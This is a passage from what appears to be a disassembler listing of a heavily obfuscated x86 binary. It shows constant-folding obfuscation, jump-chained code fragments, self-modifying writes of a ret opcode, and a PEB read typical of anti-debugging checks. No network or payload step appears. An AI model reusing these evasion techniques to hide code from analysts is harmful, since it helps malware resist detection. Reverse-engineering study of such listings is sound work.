; END OF FUNCTION CHUNK FOR sub_44445F
; START OF FUNCTION CHUNK FOR sub_452F03
loc_45595C: ; CODE XREF: sub_452F03-1274Aj
jmp loc_459F4B
; END OF FUNCTION CHUNK FOR sub_452F03
; ---------------------------------------------------------------------------
jnb loc_43AE26
mov edi, [edx]
jmp loc_44E7F8
; ---------------------------------------------------------------------------
loc_45596E: ; CODE XREF: ut7h7i2x:0043F21Aj
jz loc_442A76
jmp loc_4595ED
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_494. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545FB
loc_45597A: ; CODE XREF: sub_4545FB:loc_43B815j
push 9FBF2EE3h
pop eax
sub eax, 9828C90h
rol eax, 0Fh
jmp loc_45074E
; END OF FUNCTION CHUNK FOR sub_4545FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_45598E: ; CODE XREF: sub_449EE1:loc_44AAB8j
push edx
pop esi
xchg esi, [esp+0]
call sub_457A66
jmp loc_45174A
; END OF FUNCTION CHUNK FOR sub_449EE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_266. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_45599E: ; CODE XREF: sub_44E5AB:loc_44869Dj
jmp loc_43CA86
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_4559A3: ; CODE XREF: sub_44C791+B656j
push 0E7B3A09Fh
loc_4559A8: ; CODE XREF: sub_44C791:loc_4496ECj
call nullsub_4
retn
; END OF FUNCTION CHUNK FOR sub_44C791
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_4559AE: ; CODE XREF: sub_43BBF3+1B4EAj
jmp sub_44261F
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448CBC
loc_4559B3: ; CODE XREF: sub_448CBC-2002j
jmp nullsub_283
; END OF FUNCTION CHUNK FOR sub_448CBC
; ---------------------------------------------------------------------------
loc_4559B8: ; CODE XREF: ut7h7i2x:0044066Ej
jmp loc_44C9C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_4559BD: ; CODE XREF: sub_44C791:loc_44E6F1j
push esi
push 0A48EBCDFh
pop esi
sub esi, 323BDFC4h
jmp loc_45453C
; END OF FUNCTION CHUNK FOR sub_44C791
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_330. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4559D0: ; CODE XREF: ut7h7i2x:0045403Ej
add ebx, 0CE5556A3h
sub ebx, ds:4000FAh
xor ebx, 0D9A9768Bh
or ebx, 296C22D4h
add ebx, 80469A20h
xchg ebx, [esp]
jmp sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448AF
loc_4559F6: ; CODE XREF: sub_4448AF:loc_44FA77j
push ecx
mov esp, ebp
pop ebp
push offset sub_44DB48
jmp loc_44915E
; END OF FUNCTION CHUNK FOR sub_4448AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441C0E
loc_455A04: ; CODE XREF: sub_441C0E+Cj
call sub_443816
loc_455A09: ; CODE XREF: sub_43AB62+15C64j
jmp nullsub_234
; END OF FUNCTION CHUNK FOR sub_441C0E
; ---------------------------------------------------------------------------
loc_455A0E: ; CODE XREF: ut7h7i2x:0044CF01j
jbe sub_4445DC
cdq
jmp sub_4501C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_455A1A: ; CODE XREF: sub_43A556:loc_43EE47j
push 0EE3B3F85h
pop eax
and eax, 0BBAB9381h
add eax, 82E22F64h
xor eax, 7E52B938h
jmp loc_45927D
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_455A37: ; CODE XREF: sub_44F495-5063j
pop esi
xor edx, 7AB3420Dh
add edx, 0CE8283F7h
or edx, 0C1B9BAEDh
sub edx, 0A57FAE1h
add edx, 1CDFA4FCh
xchg edx, [esp+0Ch+var_C]
jmp sub_43D797
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_455A5E: ; CODE XREF: sub_44092D+6j
xchg esi, [esp+4+var_4]
mov esp, ebp
pop ebp
mov eax, ds:dword_443768
jmp loc_43E72F
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E835
loc_455A6F: ; CODE XREF: sub_44E835+1j
mov ebp, esp
push edi
mov edi, ecx
xchg edi, [esp+8+var_8]
push edx
push offset sub_44F613
jmp nullsub_239
; END OF FUNCTION CHUNK FOR sub_44E835
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4442CC
loc_455A82: ; CODE XREF: sub_4442CC-A72Cj
and ebp, 0EC2A62D8h
or ebp, 0E1A9E56Dh
loc_455A8E: ; CODE XREF: sub_4442CC:loc_449EC6j
mov eax, 0CF0182F6h
call sub_43AA94
push edx
push 4CC304ECh
jmp loc_4485AE
; END OF FUNCTION CHUNK FOR sub_4442CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_455AA4: ; CODE XREF: ut7h7i2x:004578E4j
jnz loc_440C86
; START OF FUNCTION CHUNK FOR sub_4593AA
loc_455AAA: ; CODE XREF: sub_4593AA:loc_4578D3j
or eax, 64B1CC7h
xor eax, 5E9209E5h
add eax, 0E6479614h
xchg eax, [esp+4+var_4]
jmp sub_444E04
; END OF FUNCTION CHUNK FOR sub_4593AA
; ---------------------------------------------------------------------------
loc_455AC4: ; CODE XREF: ut7h7i2x:00457DC9j
cmp ecx, 0C7589D60h
jmp loc_44E33E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_455ACF: ; CODE XREF: sub_4433C5-3C84j
test edx, edi
jmp loc_440F2E
; END OF FUNCTION CHUNK FOR sub_4433C5
; =============== S U B R O U T I N E =======================================
sub_455AD6 proc near ; DATA XREF: sub_4450F6+6o
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043D5A3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00440E4F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004502D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004504C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452FB0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045892D SIZE 00000005 BYTES
jb loc_440E4F
mov eax, [esp+0]
push edx
call sub_455807
mov eax, 3195933h
call sub_45854D
jmp loc_45892D
sub_455AD6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_455AF4: ; CODE XREF: sub_4471CA:loc_457713j
pop edi
sub edi, 4D3084B8h
add edi, 8A25547Bh
test edi, 2000h
jmp loc_44BA82
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_455B0C: ; CODE XREF: sub_443BC5+FB5Aj
or eax, esi
ror ebx, 3
xchg ebx, [ecx]
jnp loc_45A1BC
; END OF FUNCTION CHUNK FOR sub_443BC5
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_455B19: ; CODE XREF: sub_447EB5:loc_43A917j
; sub_4447C9+9397j ...
jmp loc_43D5C8
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_455B1E: ; CODE XREF: sub_443BC5+8F97j
; sub_457A66:loc_453CF5j ...
pop ecx
xchg ebx, [esp+4+var_4]
jmp loc_450EF6
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
loc_455B27: ; CODE XREF: ut7h7i2x:00441829j
pop edi
lea eax, nullsub_12
mov byte ptr [eax], 0C3h
jmp loc_451FA5
; ---------------------------------------------------------------------------
loc_455B36: ; CODE XREF: ut7h7i2x:0044E00Dj
mov eax, [esp]
jmp loc_456C4A
; ---------------------------------------------------------------------------
loc_455B3E: ; CODE XREF: ut7h7i2x:00448C62j
jns loc_44F0D8
not ebp
jmp sub_440783
; ---------------------------------------------------------------------------
loc_455B4B: ; CODE XREF: ut7h7i2x:0044DC42j
jnz loc_43DDEA
; =============== S U B R O U T I N E =======================================
sub_455B51 proc near ; CODE XREF: ut7h7i2x:004574E0p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00455689 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
push edi
mov edi, edx
jmp loc_455689
sub_455B51 endp
; ---------------------------------------------------------------------------
loc_455B60: ; DATA XREF: ut7h7i2x:0043A09Fo
lea eax, nullsub_18
mov byte ptr [eax], 0C3h
jmp nullsub_18
; ---------------------------------------------------------------------------
push offset loc_445E67
jmp locret_44FBE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AE3
loc_455B78: ; CODE XREF: sub_440AE3:loc_44D5A5j
pop eax
rol eax, 4
xor eax, 0AB63782Dh
sub eax, 57CEF5Dh
add eax, 162F38A0h
xchg eax, [esp+0]
jmp loc_43AE8D
; END OF FUNCTION CHUNK FOR sub_440AE3
; ---------------------------------------------------------------------------
mov eax, large fs:30h
jmp loc_456EF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_455BA2: ; CODE XREF: sub_43ABBA+10501j
; sub_44B5CF+7454j
mov edx, [edx]
shr edx, 3
mov ecx, ds:dword_4487F0
movzx edx, byte ptr [ecx+edx]
and eax, edx
jz loc_45AB72
jmp loc_455E9D
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
loc_455BBE: ; CODE XREF: ut7h7i2x:0045450Bj
rol edi, 7
; START OF FUNCTION CHUNK FOR sub_44947D
loc_455BC1: ; CODE XREF: sub_44947D:loc_44C85Dj
add edi, 0CE97CC46h
add edi, ebp
add edi, 0FF602E44h
mov [edi], eax
pop edi
popf
jmp loc_43C09E
; END OF FUNCTION CHUNK FOR sub_44947D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4473F5
loc_455BD8: ; CODE XREF: sub_4473F5+20j
rol edx, 17h
and edx, 48E371B2h
xor edx, 6A169CA5h
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
pushf
jmp loc_4455FF
; END OF FUNCTION CHUNK FOR sub_4473F5
; ---------------------------------------------------------------------------
loc_455BF3: ; CODE XREF: ut7h7i2x:0043A7DFj
jle loc_4455FA
sub ebx, 92851742h
jmp sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_455C04: ; CODE XREF: sub_44CE09:loc_4496E7j
test edx, 1
jmp loc_44E7AF
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
jz loc_44338E
jmp sub_4532E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_455C1A: ; CODE XREF: sub_450FDE+7110j
sbb ebx, esi
jnp loc_44BF64
push eax
jmp loc_454DFA
; END OF FUNCTION CHUNK FOR sub_450FDE
; =============== S U B R O U T I N E =======================================
sub_455C28 proc near ; DATA XREF: sub_456B2D+73Do
; FUNCTION CHUNK AT 0044852C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FF9A SIZE 0000000A BYTES
call sub_43AA94
push esi
push 0E674C58Eh
pop esi
sub esi, 0BC4E4C85h
or esi, 0A573494Ch
add esi, 50CA57D7h
mov [esi], eax
jmp loc_44852C
sub_455C28 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_261. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439788
loc_455C4E: ; CODE XREF: sub_439788+ADE6j
xchg ebx, [esp+0]
ror eax, 6
mov ds:dword_4487D4, eax
retn
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
loc_455C5B: ; CODE XREF: ut7h7i2x:004557CBj
jmp loc_45A4C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_455C60: ; CODE XREF: sub_44602A+7j
jmp loc_44B386
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A0DA
loc_455C65: ; CODE XREF: sub_43A0DA+5342j
jmp sub_455D84
; END OF FUNCTION CHUNK FOR sub_43A0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445E13
loc_455C6A: ; CODE XREF: sub_445E13+6j
rol eax, 6
push eax
jmp loc_45821C
; END OF FUNCTION CHUNK FOR sub_445E13
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_455C74: ; CODE XREF: sub_439BF8+4C63j
jmp nullsub_236
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
loc_455C79: ; CODE XREF: ut7h7i2x:00456973j
or edi, 0D5E51FF8h
sub edi, 98B62F6Ch
loc_455C85: ; CODE XREF: ut7h7i2x:00457ED1j
and edi, 0C248B583h
or edi, 0F5B02038h
add edi, 847CF37h
jmp loc_44F661
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_455C9C: ; CODE XREF: sub_44E5AB:loc_4553D9j
push 0D21F725Bh
pop eax
xor eax, 0B3299F8Fh
or eax, 0C4499B87h
jmp loc_457D67
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_455CB3: ; CODE XREF: sub_45854D-1AAE9j
jnp loc_43FBA5
loc_455CB9: ; CODE XREF: sub_459E54:loc_4566AEj
xor eax, 8F4AF618h
add eax, 47959497h
xchg eax, [esp+0]
jmp sub_43D797
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_455CCD: ; CODE XREF: sub_44B5CF:loc_455E9Dj
jnz loc_43F576
jmp loc_45631D
; END OF FUNCTION CHUNK FOR sub_44B5CF
; =============== S U B R O U T I N E =======================================
sub_455CD8 proc near ; CODE XREF: ut7h7i2x:004570F3p
; ut7h7i2x:00457B82j
; FUNCTION CHUNK AT 00453A28 SIZE 00000014 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 1D7A5255h
pop ecx
add ecx, 729E31F9h
jmp loc_453A28
sub_455CD8 endp
; ---------------------------------------------------------------------------
loc_455CEE: ; CODE XREF: ut7h7i2x:loc_449CD0j
; ut7h7i2x:00450BABj
jz loc_43A2B9
jmp loc_43B1F4
; =============== S U B R O U T I N E =======================================
sub_455CF9 proc near ; CODE XREF: sub_44865D:loc_43BFA9j
; sub_43C9F5+Cp
; FUNCTION CHUNK AT 0043FDD7 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00442522 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004582D3 SIZE 0000000C BYTES
xchg edx, [esp+0]
pop edx
mov edx, [edx]
add edx, 5756A02Fh
push esi
push 0F24818F8h
pop esi
rol esi, 0Dh
jmp loc_442522
sub_455CF9 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_385. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_455D15: ; CODE XREF: ut7h7i2x:00448351j
jmp loc_44349D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_455D1A: ; CODE XREF: sub_450FDE-164EEj
jmp loc_45380F
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
loc_455D1F: ; DATA XREF: sub_444A12:loc_449C09o
call sub_4417AF
mov eax, 1C5E06BAh
call sub_43AA94
mov ds:off_41D114, eax
lea eax, sub_445277
jmp loc_452D2E
; ---------------------------------------------------------------------------
loc_455D3F: ; CODE XREF: ut7h7i2x:00444903j
popf
jnz loc_4585BA
; START OF FUNCTION CHUNK FOR sub_43ECFF
loc_455D46: ; CODE XREF: sub_43ECFF+5BEFj
xor ecx, 612CF2FFh
and ecx, 0A635F073h
or ecx, 0D85CB4D7h
push offset loc_44BF48
jmp loc_43F7A0
; END OF FUNCTION CHUNK FOR sub_43ECFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445DB4
loc_455D62: ; CODE XREF: sub_445DB4:loc_45574Bj
sbb ebx, ecx
xor eax, 0B1600E0h
jmp loc_43F0D1
; END OF FUNCTION CHUNK FOR sub_445DB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4447C9
loc_455D6F: ; CODE XREF: sub_4447C9+B978j
sbb ebp, 25B8FED2h
jmp loc_44DB5B
; END OF FUNCTION CHUNK FOR sub_4447C9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_455D7A: ; CODE XREF: sub_44F495+7A9j
push offset sub_456DB3
jmp loc_43DA1C
; END OF FUNCTION CHUNK FOR sub_44F495
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_455D84 proc near ; CODE XREF: sub_43A0DA:loc_455C65j
; sub_452B14:loc_45831Aj
retn
sub_455D84 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_455D85: ; CODE XREF: sub_454B2B-16014j
jmp loc_453016
; END OF FUNCTION CHUNK FOR sub_454B2B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_455D8B: ; CODE XREF: sub_43AA94+100E9j
jmp loc_4448A9
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_455D90: ; CODE XREF: ut7h7i2x:004448D2j
jmp loc_446847
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44092D
loc_455D95: ; CODE XREF: sub_44092D-51D9j
jmp loc_451B89
; END OF FUNCTION CHUNK FOR sub_44092D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44928D
loc_455D9A: ; CODE XREF: sub_44928D:loc_442DA9j
mov eax, [ebp+8]
push eax
push ebx
push 0D90000D5h
pop ebx
or ebx, 11404A65h
add ebx, 4D4729DBh
jmp loc_458FB4
; END OF FUNCTION CHUNK FOR sub_44928D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_455DB6: ; CODE XREF: sub_439701:loc_445B6Fj
and eax, edi
mov ebx, 0BC8285A8h
jmp loc_43A942
; END OF FUNCTION CHUNK FOR sub_439701
; ---------------------------------------------------------------------------
shl ebp, 13h
shr ecx, 1Eh
jmp sub_454DE8
; =============== S U B R O U T I N E =======================================
sub_455DCD proc near ; CODE XREF: ut7h7i2x:00448838j
; sub_452D56+Ep
; FUNCTION CHUNK AT 0043A442 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D3D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004438E4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004455E4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00447680 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C40B SIZE 0000000F BYTES
xchg edx, [esp+0]
pop edx
push ecx
mov byte ptr [ebp-1], 0
mov eax, cs
xor al, al
or eax, eax
jnz loc_44E8FB
jmp loc_447680
sub_455DCD endp
; =============== S U B R O U T I N E =======================================
sub_455DE7 proc near ; CODE XREF: ut7h7i2x:00443ADAp
; ut7h7i2x:00458998j
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
mov eax, [esp-4+arg_0]
push edx
push esi
call sub_4505CE
sub_455DE7 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44D848
loc_455DF5: ; CODE XREF: sub_44D848+Dj
jmp sub_439B17
; END OF FUNCTION CHUNK FOR sub_44D848
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_455DFA: ; CODE XREF: sub_446320+3A3Bj
jmp loc_4452AB
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_455DFF: ; CODE XREF: sub_447CBE-7FB1j
jmp loc_44364D
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_455E04: ; CODE XREF: sub_43CCC3+2C78j
jmp loc_44E93C
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
loc_455E09: ; CODE XREF: ut7h7i2x:00443828j
xchg edx, [ecx]
; =============== S U B R O U T I N E =======================================
sub_455E0B proc near ; CODE XREF: sub_45292B:loc_446514p
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 004390D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043B1AD SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447D92 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044851C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045421D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454F72 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045916F SIZE 00000020 BYTES
xchg ecx, [esp+0Ch+var_C]
pop ecx
add esp, 0FFFFFFF8h
push ebx
mov [ebp-4], eax
jmp loc_454F72
sub_455E0B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_455E1B: ; CODE XREF: sub_445FA9:loc_458B4Ej
add eax, 0FD446375h
js loc_450A9D
or eax, edi
jmp loc_450A9B
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
loc_455E2E: ; CODE XREF: ut7h7i2x:loc_4507DCj
pop edi
sub edi, 1D961513h
or edi, 37B6E0Ch
call sub_44AAC7
; START OF FUNCTION CHUNK FOR sub_452802
loc_455E40: ; CODE XREF: sub_452802-11741j
jmp loc_4410D1
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_455E45: ; CODE XREF: sub_444EAA+810Aj
; sub_444EAA:loc_458F27j
call sub_453D8B
push offset loc_458715
jmp nullsub_365
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_455E54: ; CODE XREF: ut7h7i2x:00451B03j
jge loc_459316
pushf
adc ebx, 67A77B20h
loc_455E61: ; CODE XREF: ut7h7i2x:loc_4588F1j
call sub_4548FD
lea eax, sub_44B122
mov [ebp-4], eax
jmp loc_43BD04
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_92. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_455E75: ; CODE XREF: sub_4459EE+C72Fj
jmp loc_4405D1
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4474B1
loc_455E7A: ; CODE XREF: sub_4474B1+1917j
jmp loc_449564
; END OF FUNCTION CHUNK FOR sub_4474B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445BB7
loc_455E7F: ; CODE XREF: sub_445BB7+1E79j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_445BB7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442872
loc_455E84: ; CODE XREF: sub_442872+5j
jmp sub_44486A
; END OF FUNCTION CHUNK FOR sub_442872
; =============== S U B R O U T I N E =======================================
sub_455E89 proc near ; CODE XREF: sub_43A513:loc_45217Cp
; sub_456C93+7p
push ebp
push offset loc_451D27
jmp nullsub_238
sub_455E89 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A9CB
loc_455E94: ; CODE XREF: sub_44A9CB+10j
pop edx
mov eax, [ebp-4]
call sub_44BF76
; END OF FUNCTION CHUNK FOR sub_44A9CB
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_455E9D: ; CODE XREF: sub_44B5CF+A5EAj
jmp loc_455CCD
; END OF FUNCTION CHUNK FOR sub_44B5CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_455EA2: ; CODE XREF: sub_4558CC-1439j
jmp loc_456A0F
; END OF FUNCTION CHUNK FOR sub_4558CC
; =============== S U B R O U T I N E =======================================
sub_455EA7 proc near ; DATA XREF: sub_4550FF-1B731o
; FUNCTION CHUNK AT 0044821E SIZE 00000005 BYTES
jnz loc_4552D7
mov ecx, [ebx+edx-4]
or ecx, ecx
loc_455EB3: ; CODE XREF: ut7h7i2x:0044A8C1j
jz loc_448223
mov ebx, [ebx+ecx]
jmp loc_44821E
sub_455EA7 endp
; =============== S U B R O U T I N E =======================================
sub_455EC1 proc near ; DATA XREF: sub_4399B5+1174Fo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00449987 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456AC2 SIZE 00000014 BYTES
push edx
push 0C8F3C8A9h
pop edx
and edx, 407DE290h
jmp loc_449987
sub_455EC1 endp
; ---------------------------------------------------------------------------
loc_455ED3: ; CODE XREF: ut7h7i2x:0044D6C5j
mov edi, ebp
sbb ecx, ebx
loc_455ED7: ; CODE XREF: ut7h7i2x:loc_44D6AFj
or ecx, 0EBDC82BBh
add ecx, 44778FAh
xchg ecx, [esp]
jmp nullsub_9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455461
loc_455EEB: ; CODE XREF: sub_455461+Dj
pushf
loc_455EEC: ; CODE XREF: sub_439BF8+176D5j
push 0E364DDDAh
pop eax
and eax, 0A076A51Bh
add eax, 2A90E215h
jmp loc_454E30
; END OF FUNCTION CHUNK FOR sub_455461
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454A2B
loc_455F03: ; CODE XREF: sub_454A2B-14D8Aj
lea eax, sub_454A2B
mov byte ptr [eax], 0C3h
loc_455F0C: ; CODE XREF: ut7h7i2x:loc_4465C1j
jmp sub_454A2B
; ---------------------------------------------------------------------------
loc_455F11: ; CODE XREF: sub_454A2Bj
xchg eax, [esp+4+var_4]
mov edx, eax
pop eax
mov eax, [esp+0]
push edi
mov edi, edx
jmp loc_4451D0
; END OF FUNCTION CHUNK FOR sub_454A2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576C6
loc_455F22: ; CODE XREF: sub_4576C6-150FDj
jnp loc_446CC5
loc_455F28: ; CODE XREF: sub_453E14-16F56j
; sub_453E14:loc_448AAFj ...
movzx eax, word ptr [ebp-6]
push edx
push offset sub_450E41
jmp nullsub_298
; END OF FUNCTION CHUNK FOR sub_4576C6
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_455F37 proc near ; CODE XREF: sub_442B3B+11735j
retn
sub_455F37 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A83C
loc_455F38: ; CODE XREF: sub_45A83C+Aj
jmp loc_445D57
; END OF FUNCTION CHUNK FOR sub_45A83C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446BB5
loc_455F3D: ; CODE XREF: sub_446BB5+12C1Cj
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_446BB5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E59
loc_455F42: ; CODE XREF: sub_449E59+5j
jmp nullsub_375
; END OF FUNCTION CHUNK FOR sub_449E59
; ---------------------------------------------------------------------------
loc_455F47: ; CODE XREF: ut7h7i2x:00439804j
jmp loc_4499FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45854D
loc_455F4C: ; CODE XREF: sub_45854D+6j
mov edx, ds:dword_43AEB0
or edx, edx
jnz loc_43D767
jmp loc_450762
; END OF FUNCTION CHUNK FOR sub_45854D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_455F5F: ; CODE XREF: sub_44445F:loc_446607j
jge loc_445770
loc_455F65: ; CODE XREF: sub_4518D7+6253j
jmp loc_43EA3F
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45601B
loc_455F6A: ; CODE XREF: sub_45601B+12j
jmp loc_450800
; END OF FUNCTION CHUNK FOR sub_45601B
; ---------------------------------------------------------------------------
loc_455F6F: ; CODE XREF: ut7h7i2x:00441D06j
jmp loc_458558
; ---------------------------------------------------------------------------
mov ebp, [ecx]
add ebp, esi
jmp loc_445770
; ---------------------------------------------------------------------------
loc_455F7D: ; CODE XREF: ut7h7i2x:00439F4Bj
jo loc_44FC3D
; =============== S U B R O U T I N E =======================================
sub_455F83 proc near ; CODE XREF: ut7h7i2x:loc_44EB4Ep
xchg edi, [esp+0]
pop edi
push edi
